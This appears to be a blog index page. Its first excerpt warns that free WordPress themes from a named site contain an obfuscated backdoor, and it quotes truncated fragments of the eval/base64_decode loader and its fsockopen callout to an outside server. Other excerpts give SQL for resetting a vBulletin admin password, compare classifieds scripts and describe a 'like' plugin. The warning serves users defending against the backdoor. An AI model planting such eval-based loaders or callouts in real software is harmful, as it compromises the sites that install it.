wpsphere.com scam site

this site provides free wordpress themes.

wpsphere.com

Look in the header of all the themes:

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3Mz....

connecting to a server in the Netherlands…

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80...

Be careful out there, free is not always good.

Read More

How to recover a lost vbulletin admin password with phpMyAdmin

How to recover a lost vbulletin admin password with phpMyAdmin

A quicky for future reference…

UPDATE user
set password = MD5(concat(MD5('newpassword'), user.salt))
WHERE userid = 1

I’m assuming you are user ID 1. You might need a prefix, but most likely not.

UPDATE PREFIXuser
set password = MD5(concat(MD5('newpassword'), PREFIXuser.salt))
WHERE userid = *

Works on 3.x series forums, as for that piece of shit vbulletin 4 your mileage may vary.

Read More

Classipress Vs Ikiclassifieds

Classipress Vs Ikiclassifieds

There are a lot of PHP based classifieds scripts out there. Let’s face it, most of them are crap. I own the licence for wpclassipress and ikiclassifieds and have used them both extensively online so let’s take a look at them.

Read More

wp liked plugin

wp liked plugin

I’m working on a wordpress plugin for a free future release here similar to the function found in facebook, well that’s the plan anyway. So far I have it enabled to pull an array of avatars of users who have liked a post (via the user photo plugin or gravatar as a fallback) & the like count for the post as well as the like count (and the liked post ID) for individual members. as you can guess this plugin was designed with registered users only in mind. It could possibly work for guests but I never designed it that way. The plugin is running in an early form over at imgxtc.com. (contains some nsfw content!)

Read More